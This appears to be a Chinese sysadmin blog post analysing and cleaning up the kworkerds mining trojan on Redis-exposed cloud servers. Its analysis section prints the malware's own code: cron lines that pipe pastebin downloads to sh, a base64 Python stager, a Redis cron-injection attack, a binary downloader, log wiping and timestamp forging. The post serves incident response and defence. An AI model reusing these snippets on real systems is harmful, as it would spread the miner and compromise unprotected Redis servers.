公司之前的開發和測試環境是在騰訊雲上，部分服務器中過一次挖礦木馬 kworkerds，本文為我當時分析和清理木馬的記錄，希望能對大家有所幫助。

現象

• top 命令查看，顯示 CPU 佔用 100%，進程名無明顯規則，如：TzBeq3AM。進程有時候會被隱藏，通過分析腳本刪除部分依賴文件，可以顯示出來。
• 存在可疑的 python 進程。
• crontab 被寫入了一個定時任務，每半小時左右會從 pastebin 上下載腳本並且執行。

原因

redis 沒有啟用密碼認證。

清理方案

將 redis 服務關閉，並設置密碼。

先阻斷外部連接，再清理定時任務，之後刪除挖礦病毒本體，防止再生。

<code># 防止木馬再次下載
echo '127.0.0.1 pastebin.com' >> /etc/hosts

# 刪除掉局域網服務器之間的免密登錄 

# 本機定時任務和木馬都清理乾淨了，重啟後木馬又重新執行，最後發現是因為局域網服務器免密登錄造成的，木馬會通過免密登錄互相複製。
rm -rf ~/.ssh

# 先 kill 掉木馬進程，不然服務器操作起來極慢
ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill -9
ps -ef|grep kworkerds|grep -v grep|awk '{print $2}'|xargs kill -9

# 清理定時任務及木馬文件
crontab -r

chattr -i /etc/cron.d/root
sudo echo "" > /etc/cron.d/root

chattr -i /etc/cron.d/apache
sudo echo "" > /etc/cron.d/apache

chattr -i /var/spool/cron/root
sudo echo "" > /var/spool/cron/root

chattr -i /var/spool/cron/crontabs/root
sudo echo "" > /var/spool/cron/crontabs/root

chattr -i /usr/local/lib/libntpd.so
rm -rf /usr/local/lib/libntpd.so

chattr -i /etc/ld.so.preload
rm -rf /etc/ld.so.preload

chattr -i /usr/local/bin/dns
rm -rf /usr/local/bin/dns

rm -rf /etc/cron.hourly/oanacroner
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.monthly/oanacroner
rm -rf /tmp/kworkerds
rm -rf /tmp/.38t9guft0055d0565u444gtjr0
rm -rf /tmp/.a

# 再次 kill 掉進程，防止清理過程中再次啟動
ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill -9 

ps -ef|grep kworkerds|grep -v grep|awk '{print $2}'|xargs kill -9

# 驗證進程 kill 成功
ps -ef|grep kworkerds
ps -ef|grep pastebin

# 驗證定時任務清理乾淨
cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root

# 驗證相關木馬文件刪除乾淨
ls /usr/local/lib/libntpd.so /etc/ld.so.preload /etc/cron.hourly/oanacroner /etc/cron.daily/oanacroner /etc/cron.monthly/oanacroner /tmp/kworkerds /tmp/.38t9guft0055d0565u444gtjr0 /tmp/.a

# 查看當前用戶定時任務
crontab -l

# 還原 hosts 配置
sed -i 's/^127.0.0.1 pastebin.com*$//g' /etc/hosts

# 重啟再次驗證
reboot
/<code>

分析

木馬的核心代碼邏輯如下：

<code>update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
    echocron
else
    if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmph
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi 

    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
fi
/<code>

首先檢查是否有更新，有更新就會執行 echocron 方法進行更新。

<code>function echocron() {
    echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n##" > /etc/cron.d/root
    echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n##" > /etc/cron.d/system
    echo -e "*/23 * * * *   (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/31 * * * *   (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    if [ ! -f "/etc/cron.hourly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    if [ ! -f "/etc/cron.daily/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    if [ ! -f "/etc/cron.monthly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/oanacron
    touch -acmr /bin/sh /etc/cron.daily/oanacron
    touch -acmr /bin/sh /etc/cron.monthly/oanacron
}
/<code>

檢查 /tmp/.tmph 文件是否存在，如果存在則刪除，執行 python 函數。

<code>function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmph
} 

/<code>

base64 的 python 代碼解碼後內容為：

<code>$ python
Python 3.5.0 (v3.5.0:374f501f4567, Sep 12 2015, 11:00:19)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz')
b"#coding: utf-8\\nimport urllib\\nimport base64\\n\\nd= 'https://pastebin.com/raw/eRkrSQfE'\\ntry:\\n    page=base64.b64decode(urllib.urlopen(d).read())\\n    exec(page)\\nexcept:\\n    pass"
/<code>

解碼後的 python 代碼又從https://pastebin.com/raw/eRkrSQfE讀取內容，進行執行。

再次解碼後，內容為針對 redis 的攻擊腳本，核心代碼如下：

<code>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"rn')
s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"rn')
s.send('config set dir /var/spool/cronrn')
s.send('config set dbfilename rootrn')
s.send('savern')
s.close()
/<code>

接著，kills 函數主要是 kill 掉其他木馬以及騰訊雲、阿里雲等安全監控服務。

downloadrun 函數是下載木馬 kworkerds 腳本並執行。

<code>function downloadrun() {
    ps=$(netstat -anp | grep :13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 & 

        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}
/<code>

接著執行 echocron 函數，寫入定時任務，並清楚相關日誌。

之後執行 system 和 top 函數，下載相關依賴文件，隱藏進程等。

sleep 10秒，判斷是否與端口 13531 建立連接，如果沒有則執行 downloadrunxm 函數，連接挖礦服務器。

預防

• 任何服務都要設置密碼認證，且強密碼。
• 為每個服務創建指定用戶運行，防止用 root 用戶直接啟動。
• 啟用防火牆規則。

linux 知識點

隱藏木馬文件文件，防止通過時間排序來判斷木馬文件。

<code>touch -acmr /bin/sh /etc/ld.so.preload/<code>

touch參數說明：

• a 改變文件的讀取時間記錄；
• c 假如文件不存在，不會建立新的文件。
• m 改變文件的修改時間記錄；
• r 使用參考文件的時間記錄。

定時任務相關文件

/var/spool/cron：目錄下存放的是每個用戶包括 root 的 crontab 任務，每個任務以創建者的名字命名。

/etc/cron.d：用來存放任何要執行的 crontab 文件或腳本。

/etc/cron.hourly、/etc/cron.daily、/etc/cron.weekly、/etc/cron.monthly：用 anacron 執行週期性的定時任務。

閱讀更多 叨叨軟件測試 的文章

關鍵字: 中央處理器 騰訊 測試環境